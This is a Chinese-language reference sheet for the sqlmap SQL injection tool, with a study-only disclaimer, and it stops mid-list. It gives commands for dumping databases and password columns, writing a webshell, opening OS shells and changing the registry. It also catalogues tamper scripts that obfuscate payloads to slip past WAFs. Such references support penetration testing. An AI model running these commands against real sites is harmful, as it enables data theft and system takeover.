Sqlmap

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

项目地址

https://github.com/sqlmapproject/sqlmap

文章 & Reference

基础使用

检测注入

sqlmap -u URL -v 3 --random-agent                       # 判断注入
sqlmap -u URL -p id                                     # 指定参数注入
sqlmap -u URL --cookie="xxxxx"                          # 带 cookie 注入
sqlmap -u URL --batch                                   # 不要请求用户输入,使用默认行为
sqlmap -r aaa.txt                                       # post 型注入

sqlmap -u URL --flush-session                           # 清除缓存

sqlmap -u URL --os "Windows"                            # 指定操作系统
sqlmap -u URL --dbms mysql --level 3                    # 指定数据库类型为 mysql,级别为 3(共 5 级,级别越高,检测越全面)
sqlmap -u URL --dbms Microsoft SQL Server
sqlmap -u URL --dbms mysql --risk 3                     # 指定执行测试的风险(1-3, 默认 1) 1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加 OR 语句的 SQL 注入测试
sqlmap -u URL --proxy "socks5://127.0.0.1:1080"         # 代理注入测试
sqlmap -u URL --batch --smart                           # 启发式判断注入

获取信息

sqlmap -u URL --current-db          # 获取当前数据库
sqlmap -u URL --dbs                 # 枚举所有数据库
sqlmap -u URL -f                    # 检查 DBMS 版本
sqlmap -u URL --is-dba              # 判断当前用户是否是 dba
sqlmap -u URL --users               # 列出数据库管理系统用户
sqlmap -u URL --privileges          # 枚举 DBMS 用户权限
sqlmap -u URL --passwords           # 获取当前数据库密码

sqlmap -u URL -D DATABASE --tables  # 获取数据库表
sqlmap -u URL -D DATABASE -T TABLES --columns           # 获取指定表的列名
sqlmap -u URL -D DATABASE -T TABLES -C COLUMNS --dump   # 获取指定表的列名
sqlmap -u URL -dbms mysql -level 3 -D test -T admin -C "username,password" -dump    # dump 出字段 username 与 password 中的数据
sqlmap -u URL --dump-all            # 列出所有数据库,所有表内容

搜索字段

sqlmap -r "c:\tools\request.txt" -dbms mysql -D dedecms --search -C admin,password  # 在 dedecms 数据库中搜索字段 admin 或者 password.

读取与写入文件

首先找需要网站的物理路径,其次需要有可写或可读权限.

-file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)
-file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell)
-file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

sqlmap -r aaa.txt --file-dest "e:\php\htdocs\dvwa\inc\include\1.php" --file-write "f:\webshell\1112.php"

# 注 : mysql 不支持列目录,仅支持读取单个文件.sqlserver 可以列目录,不能读写文件,但需要一个 xp_dirtree 函数

提权

sqlmap -u URL --sql-shell                       # 获取一个 sql-shell 会话
sqlmap -u URL --os-shell                        # 获取一个 os-shell 会话
sqlmap -u URL --os-cmd=ipconfig                 # 在注入点直接执行命令
sqlmap -d "mssql://sa:sql123456@ip:1433/master" --os-shell  # 知道数据库密码后提权成为交互式系统shell

对 Windows 注册表操作

--reg-read                                      # 读取注册表值
--reg-add                                       # 写入注册表值
--reg-del                                       # 删除注册表值
--reg-key,--reg-value,--reg-data,--reg-type     # 注册表辅助选项

sqlmap -u URL --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

预估完成时间

--eta                                           # 计算注入数据的剩余时间

测试 WAF/IPS/IDS 保护

--identify-waf                                                      # 尝试找出WAF/IPS/IDS保护，方便用户做出绕过方式。
--mobile                                                            # 模仿智能手机
--referer "http://www.google.com"                                   # 模拟来源
--user-agent "Googlebot/2.1(+http://www.googlebot.com/bot.html)"    # 模拟谷歌蜘蛛
--skip-waf

尝试 getshell

sqlmap -d "mysql://root:root@192.168.1.1:3306/mysql" --os-shell

宽字节检测

sqlmap -u URL --dbms mysql --prefix "%df%27" --technique U -v 3     # 宽字节检测

union 语句测试

--union-cols=UCOLS  测试UNION查询的SQL注入的列的范围
--union-char=UCHAR  用来破解列数的字符
--union-from=UFROM  在UNION查询的FROM部分中使用的表

tamper

用法

python sqlmap.py -u http://xx.xxx.xx.xx?id=1 --tamper xxx.py

相关文章

0eunion.py

Replaces instances of UNION with e0UNION

使用 e0UNION 替换 UNION

Requirement:

MySQL
MsSQL

Notes:

Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

>>> tamper('1 UNION ALL SELECT')
'1e0UNION ALL SELECT'

apostrophemask.py

Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)

将 ' 替换成 UTF-8 urlencoded 的 %EF%BC%87

References:

http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/
https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850
https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps

>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py

Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)

将 ' 替换成 %00%27

>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'

appendnullbyte.py

Appends (Access) NULL byte character (%00) at the end of payload

在参数末尾加入 %00

Requirement:

Microsoft Access

Reference

http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection

>>> tamper('1 AND 1=1')
'1 AND 1=1%00'

base64encode.py

Base64-encodes all characters in a given payload

base64 编码所有字符

>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='

between.py

Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'

将 > 字符替换为 NOT BETWEEN 0 AND

将 = 字符替换为 BETWEEN # AND #

>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'

binary.py

Injects keyword binary where possible

Requirement:

MySQL

>>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
'1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
>>> tamper('1 AND 2>1')
'1 AND binary 2>binary 1'
>>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'

bluecoat.py

Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE

将 sql 语句后的空格字符替换为 %09，LIKE 替换字符 =

Requirement:

Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147

Tested against:

MySQL 5.1, SGOS

>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'

chardoubleencode.py

Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)

二次URL编码

>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

charencode.py

URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)

URL编码

Tested against:

Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0

>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

charunicodeencode.py

Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)

URL编码

Requirement:

ASP
ASP.NET

Tested against:

Microsoft SQL Server 2000
Microsoft SQL Server 2005
MySQL 5.1.56
PostgreSQL 9.0.3

>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

charunicodeescape.py

Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)

url 解码中的 % 换成 \\

>>> tamper('SELECT FIELD FROM TABLE')
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'

commalesslimit.py

Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart

替换字符的位置

Requirement:

MySQL

Tested against:

MySQL 5.0 and 5.5

>>> tamper('LIMIT 2, 3')
'LIMIT 3 OFFSET 2'

commalessmid.py

Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart

用 'MID(A FROM B FOR C)' 代替 'MID(A, B, C)'

Requirement:

MySQL

Tested against:

MySQL 5.0 and 5.5

>>> tamper('MID(VERSION(), 1, 1)')
'MID(VERSION() FROM 1 FOR 1)'

commentbeforeparentheses.py

Prepends (inline) comment before parentheses (e.g. ( -> /**/()

在括号前添加内联注释

Tested against:

Microsoft SQL Server
MySQL
Oracle
PostgreSQL

>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'

concat2concatws.py

Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart

将 concat(a,b) 替换成 concat_ws(mid(char(0),0,0),a,b)

Requirement:

MySQL

Tested against:

MySQL 5.0

>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
"""

dunion.py

Replaces instances of UNION with DUNION

将 UNION 换成 DUNION

Requirement:

Oracle

Reference

https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

>>> tamper('1 UNION ALL SELECT')
'1DUNION ALL SELECT'

equaltolike.py

Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart

将 = 换成 LIKE

Tested against:

Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5

>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'

equaltorlike.py

Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart

将 = 换成 RLIKE

Tested against:

MySQL 4, 5.0 and 5.5

>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id RLIKE 1'

escapequotes.py

Slash escape single and double quotes (e.g. ' -> ')

>>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#'

greatest.py

Replaces greater than operator ('>') with 'GREATEST' counterpart

使用 greatest 替换 >

Tested against:

MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0

>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

halfversionedmorekeywords.py

Adds (MySQL) versioned comment before each keyword

在每个关键词前添加(MySQL)的版本注释

Requirement:

MySQL < 5.1

Tested against:

MySQL 4.0.18, 5.0.22

>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

hex2char.py

Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart

用对应的 CONCAT(CHAR(),...) 替换每个 (MySQL)0x 编码的字符串。

Requirement:

MySQL

Tested against:

MySQL 4, 5.0 and 5.5

>>> tamper('SELECT 0xdeadbeef')
'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'

htmlencode.py

HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ')

HTML编码（使用代码点）所有非字母数字字符（例如，'-> '）。

>>> tamper("1' AND SLEEP(5)#")
'1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'

ifnull2casewhenisnull.py

Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart

用 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' 代替 'IFNULL(A, B)' 这样的实例。

Requirement:

MySQL
SQLite (possibly)
SAP MaxDB (possibly)

Tested against:

MySQL 5.0 and 5.5

>>> tamper('IFNULL(1, 2)')
'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'

ifnull2ifisnull.py

Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart

用 IF(ISNULL(A), B, A) 代替 IFNULL(A, B) 这样的实例。

Requirement:

MySQL
SQLite (possibly)
SAP MaxDB (possibly)

Tested against:

MySQL 5.0 and 5.5

>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'

informationschemacomment.py

Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier

在所有出现的（MySQL）"information_schema" 标识符的末尾添加一个内联注释（/**/）。

>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'

least.py

Replaces greater than operator ('>') with 'LEAST' counterpart

用 LEAST 代替大于运算符（>）。

Tested against:

MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0

>>> tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'

lowercase.py

Replaces each keyword character with lower case value (e.g. SELECT -> select)

用小写字母值替换每个关键词字符（例如：SELECT -> select）。

Tested against:

Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0

>>> tamper('INSERT')
'insert'

luanginx.py

LUA-Nginx WAFs Bypass (e.g. Cloudflare)

Reference:

https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/

>>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload)
'34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1'

misunion.py

Replaces instances of UNION with -.1UNION

UNION 修改为 -.1UNION

Requirement:

MySQL

Reference

https://raw.githubusercontent.com/y0unge/Notes/master/SQL%20Injection%20WAF%20Bypassing%20shortcut.pdf

>>> tamper('1 UNION ALL SELECT')
'1-.1UNION ALL SELECT'
>>> tamper('1" UNION ALL SELECT')
'1"-.1UNION ALL SELECT'

modsecurityversioned.py

Embraces complete query with (MySQL) versioned comment

Requirement:

MySQL

Tested against:

MySQL 5.0

>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30963AND 2>1*/--'

modsecurityzeroversioned.py

Embraces complete query with (MySQL) zero-versioned comment

Requirement:

MySQL

Tested against:

MySQL 5.0

>>> tamper('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'

multiplespaces.py

Adds multiple spaces (' ') around SQL keywords

在sql关键字周围添加多个空格

Reference

https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1     UNION     SELECT     foobar'

overlongutf8.py

Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)

将给定的有效载荷中的所有（非字母）字符转换为超长 UTF8（不处理已经编码的）（例如 ' -> %C0%A7）

Reference:

https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/

>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'

overlongutf8more.py

Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)

Reference:

https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/

>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'

percentage.py

Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T)

在每一个字符前面添加一个百分比符号

Requirement:

Tested against:

Microsoft SQL Server 2000, 2005
MySQL 5.1.56, 5.5.11
PostgreSQL 9.0

>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'

plus2concat.py

Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart

用对应的 (MsSQL) 函数 CONCAT() 代替加号运算符('+')。

Tested against:

Microsoft SQL Server 2012

Requirements:

Microsoft SQL Server 2012+

>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'

>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe'

plus2fnconcat.py

Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart

Tested against:

Microsoft SQL Server 2008

Requirements:

Microsoft SQL Server 2008+

Notes:

Useful in case ('+') character is filtered
https://msdn.microsoft.com/en-us/library/bb630290.aspx

>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'

>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'

randomcase.py

Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)

字符替换成大小写字符

Tested against:

Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
SQLite 3

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'InSeRt'
>>> tamper('f()')
'f()'
>>> tamper('function()')
'FuNcTiOn()'
>>> tamper('SELECT id FROM `user`')
'SeLeCt id FrOm `user`'

randomcomments.py

Add random inline comments inside SQL keywords (e.g. SELECT -> S//E//LECT)

在关键字添加内联注释 //

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/NS/**/ERT'

schemasplit.py

Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users')

将 FROM 模式标识符（如 testdb.users ）与空白处分割（如 testdb 9.e.users ）。

Requirement:

MySQL

Reference:

https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

>>> tamper('SELECT id FROM testdb.users')
'SELECT id FROM testdb 9.e.users'

sleep2getlock.py

Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)"

用 GET_LOCK('ETgP',5) 取代 SLEEP(5)

Requirement:

MySQL

Tested against:

MySQL 5.0 and 5.5

Reference:

https://zhuanlan.zhihu.com/p/35245598

>>> tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName
True

sp_password.py

Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

将 sp_password 附加到有效负载的末尾，用来混淆

Requirement:

MSSQL

Reference:

http://websec.ca/kb/sql_injection

>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'

space2comment.py

Replaces space character (' ') with comments '/**/'

空格替换成//

Tested against:

Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0

>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'

space2dash.py

Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')

用一个注释（'--'）代替空格字符（''），后面是一个随机字符串和一个新行（'/n'）。

Requirement:

MSSQL
SQLite

Reference:

https://proton.onsec.ru/contest/

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227'

space2hash.py

Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

用（'#'）字符替换（MySQL）空格字符（''）的实例，后面是一个随机字符串和一个新行（'/n'）。

Requirement:

MySQL

Tested against:

MySQL 4.0, 5.0

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227'

space2morecomment.py

Replaces (MySQL) instances of space character (' ') with comments '/_/'

空格替换成/ /

Tested against:

MySQL 5.0 and 5.5

>>> tamper('SELECT id FROM users')
'SELECT/**_**/id/**_**/FROM/**_**/users'

space2morehash.py

Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

用（'#'）字符替换（MySQL）空格字符（''）的实例，后面是一个随机字符串和一个新行（'/n'）。

Requirement:

MySQL >= 5.1.13

Tested against:

MySQL 5.1.41

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227'

space2mssqlblank.py

Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters

将(MsSQL)空格字符('')的实例替换为一个有效的备用字符集中的随机空白字符。

Requirement:

Microsoft SQL Server

Tested against:

Microsoft SQL Server 2000
Microsoft SQL Server 2005

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%04users'

space2mssqlhash.py

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')

将空格替换成 %23%0A

Requirement:

MSSQL
MySQL

>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'

space2mysqlblank.py

Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters

将(MySQL)空格字符('')的实例替换为有效替代字符集中的随机空白字符

Requirement:

MySQL

Tested against:

MySQL 5.1

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0CFROM%0Dusers'

space2mysqldash.py

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')

用注释（'--'）代替空格字符（''），后面是一个新行（'/n'）。

Requirement:

MySQL
MSSQL

>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'

space2plus.py

Replaces space character (' ') with plus ('+')

将空格替换成 +

>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'

space2randomblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

用一组有效的备用字符中的随机空白字符替换空格字符（''）。

Tested against:

Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'

substring2leftright.py

Replaces PostgreSQL SUBSTRING with LEFT and RIGHT

用 LEFT 和 RIGHT 取代 PostgreSQL 的 SUBSTRING

Tested against:

PostgreSQL 9.6.12

>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')
'LEFT((SELECT usename FROM pg_user)::text,1)'
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')
'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'

symboliclogical.py

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

将 and 和 or 的逻辑运算符分别替换为 (&& 和 ||)

>>> tamper("1 AND '1'='1")
"1 %26%26 '1'='1"

unionalltonnion.py

